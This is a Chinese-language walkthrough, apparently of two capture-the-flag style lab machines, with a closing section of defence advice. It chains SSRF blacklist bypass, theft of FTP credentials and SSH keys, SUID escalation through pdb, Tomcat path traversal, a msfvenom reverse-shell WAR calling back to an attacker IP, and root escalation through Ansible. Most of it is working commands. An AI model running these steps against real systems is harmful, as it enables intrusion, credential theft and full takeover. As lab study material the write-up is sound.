SSRF漏洞利用与提权技术详解<\/h1>

1. 初始信息收集与SSRF漏洞发现<\/h2>

1.1 目标识别与端口扫描<\/h3>
使用Nmap进行初始扫描：nmap -v -sSV -Pn 10.10.11.111 -T4 -sC<\/code><\/li>
发现仅开放80端口，但直接访问失败<\/li>
通过添加host头解决访问问题：echo "10.10.11.111 forge.xxx" >> \/etc\/hosts<\/code><\/li>
<\/ul>
1.2 子域名枚举<\/h3>

使用wfuzz工具枚举子域名：
wfuzz -c -u "http:\/\/forge.xxx\/" -H "Host:FUZZ.forge.xxx" -w \/usr\/share\/amass\/wordlists\/subdomains-top1mil-5000.txt
<\/code><\/pre>
<\/li>
发现admin.forge.xxx<\/code>子域名，添加到hosts文件<\/li>
<\/ul>
1.3 SSRF漏洞发现<\/h3>

发现上传功能存在黑名单限制<\/li>
通过大小写绕过：http:\/\/aDmin.forGe.xxx\/<\/code><\/li>
分析返回包发现敏感路径\/announcements<\/code><\/li>
继续利用SSRF访问该路径获取更多信息<\/li>
<\/ul>
2. SSRF深度利用<\/h2>
2.1 获取FTP凭据<\/h3>

通过SSRF读取\/announcements<\/code>获取：

FTP用户名：user<\/code><\/li>
密码：heightofsecurity123!<\/code><\/li>
<\/ul>
<\/li>
发现\/upload<\/code> API端点，参数u<\/code>存在SSRF漏洞<\/li>
<\/ul>
2.2 组合利用SSRF与FTP<\/h3>

构造SSRF请求读取FTP内容：
http:\/\/aDmin.forGe.xxx\/upload?u=ftp:\/\/user:heightofsecurity123!@FORGE.xxx
<\/code><\/pre>
<\/li>
成功读取用户家目录文件<\/li>
<\/ul>
2.3 获取SSH私钥<\/h3>

通过SSRF读取SSH私钥：
http:\/\/aDmin.forGe.xxx\/upload?u=ftp:\/\/user:heightofsecurity123!@FORGE.xxx\/.ssh\/id_rsa
<\/code><\/pre>
<\/li>
保存私钥后连接SSH：
ssh -i id_rsa user@10.10.11.111
<\/code><\/pre>
<\/li>
<\/ul>
3. 提权技术<\/h2>
3.1 初始权限检查<\/h3>

检查sudo权限：sudo -l<\/code><\/li>
发现可无密码执行特定Python文件<\/li>
<\/ul>
3.2 利用Python调试器提权<\/h3>

执行可疑Python文件，发现会调用pdb调试器<\/li>
在pdb调试模式下执行Python代码：
import<\/span> os; os.<\/span>system('chmod +s \/bin\/bash'<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
通过设置SUID位提权：\/bin\/bash -p<\/code><\/li>
<\/ul>
4. 第二靶机：GitBucket与Tomcat漏洞利用<\/h2>
4.1 初始扫描<\/h3>

扫描发现开放22、443、8080端口<\/li>
8080端口运行GitBucket代码仓库<\/li>
<\/ul>
4.2 获取Tomcat凭据<\/h3>

在GitBucket的commit历史中发现：

用户名：tomcat<\/code><\/li>
密码：42MrHBf*z8{Z%<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
4.3 Tomcat路径遍历漏洞<\/h3>

利用反代路径遍历漏洞访问管理界面：
https:\/\/seal.xxx\/manager\/status\/..;\/html
<\/code><\/pre>
<\/li>
参考漏洞：Tomcat Path Traversal via Reverse Proxy Mapping<\/li>
<\/ul>
4.4 上传Web Shell<\/h3>

生成war格式的反向shell：
msfvenom -p java\/jsp_shell_reverse_tcp LHOST=10.10.16.46 LPORT=6666 -f war -o shell.war
<\/code><\/pre>
<\/li>
通过Burp Suite修改上传路径后上传<\/li>
<\/ul>
4.5 获取初始shell<\/h3>

设置监听：nc -lvvp 6666<\/code><\/li>
访问上传的shell获取反向连接<\/li>
<\/ul>
5. Ansible Playbook提权技术<\/h2>
5.1 发现可疑进程<\/h3>

检查root进程：ps aux | grep root<\/code><\/li>
发现Ansible Playbook定期执行备份<\/li>
<\/ul>
5.2 分析Playbook文件<\/h3>

检查\/opt\/backups\/playbook\/run.yml<\/code><\/li>
关键配置：copy_links=yes<\/code>允许符号链接<\/li>
<\/ul>
5.3 创建符号链接<\/h3>

创建指向SSH私钥的符号链接：
ln -s ~\/home\/luis\/.ssh\/id_rsa \/var\/lib\/tomcat9\/webapps\/ROOT\/admin\/dashboard\/uploads\/id_rsa
<\/code><\/pre>
<\/li>
等待Playbook执行后，私钥会被备份到\/opt\/backups\/archives<\/code><\/li>
<\/ul>
5.4 获取SSH访问<\/h3>

解压备份文件获取私钥<\/li>
设置适当权限：chmod 600 id_rsa<\/code><\/li>
SSH连接目标主机<\/li>
<\/ul>
5.5 最终提权方法<\/h3>
方法一：直接执行Playbook<\/h4>
TF=<\/span>$(<\/span>mktemp)<\/span>
<\/span><\/span>echo '[{hosts: localhost, tasks: [shell: \/bin\/sh <\/dev\/tty >\/dev\/tty 2>\/dev\/tty]}]'<\/span> >$TF
<\/span><\/span>sudo ansible-playbook $TF
<\/span><\/span><\/code><\/pre>方法二：创建自定义Playbook<\/h4>
创建root.yml<\/code>文件：<\/p>
name<\/span>: Ansible Copy Example Local to Remote<\/span>
<\/span><\/span>hosts<\/span>: localhost<\/span>
<\/span><\/span>tasks<\/span>:
<\/span><\/span>  - name<\/span>: copying file with playbook<\/span>
<\/span><\/span>    become<\/span>: true<\/span>
<\/span><\/span>    copy<\/span>:
<\/span><\/span>      src<\/span>: \/root\/root.txt<\/span>
<\/span><\/span>      dest<\/span>: \/dev\/shm<\/span>
<\/span><\/span>      owner<\/span>: luis<\/span>
<\/span><\/span>      group<\/span>: luis<\/span>
<\/span><\/span>      mode<\/span>: 0777<\/span>
<\/span><\/span><\/code><\/pre>执行：sudo \/usr\/bin\/ansible-playbook root.yml<\/code><\/p>
6. 关键知识点总结<\/h2>


SSRF漏洞利用<\/strong>：<\/p>

通过大小写绕过黑名单<\/li>
结合FTP协议读取系统文件<\/li>
获取SSH私钥实现权限提升<\/li>
<\/ul>
<\/li>

Web应用漏洞<\/strong>：<\/p>

GitBucket中敏感信息泄露<\/li>
Tomcat反代路径遍历漏洞(..;\/绕过)<\/li>
Web Shell上传技术<\/li>
<\/ul>
<\/li>

提权技术<\/strong>：<\/p>

利用Python调试器(pdb)执行系统命令<\/li>
Ansible Playbook符号链接漏洞<\/li>
通过sudo权限执行任意Playbook<\/li>
<\/ul>
<\/li>

信息收集技巧<\/strong>：<\/p>

子域名枚举<\/li>
源代码审计<\/li>
进程与定时任务分析<\/li>
<\/ul>
<\/li>

权限维持<\/strong>：<\/p>

SSH私钥利用<\/li>
文件权限控制<\/li>
备份文件分析<\/li>
<\/ul>
<\/li>
<\/ol>
7. 防御建议<\/h2>


防止SSRF<\/strong>：<\/p>

实施严格的输入验证<\/li>
禁用不需要的URL协议<\/li>
使用白名单而非黑名单<\/li>
<\/ul>
<\/li>

Web应用安全<\/strong>：<\/p>

定期审计代码中的敏感信息<\/li>
及时更新中间件<\/li>
限制管理界面访问<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

最小权限原则<\/li>
定期审计sudo权限<\/li>
监控异常进程<\/li>
<\/ul>
<\/li>

Ansible安全<\/strong>：<\/p>

限制Playbook执行权限<\/li>
禁用不必要的模块功能<\/li>
审计Playbook内容<\/li>
<\/ul>
<\/li>
<\/ol>
通过本案例可以全面了解从SSRF漏洞发现到最终系统提权的完整攻击链，以及如何利用各种中间件和自动化工具配置不当进行权限提升。<\/p>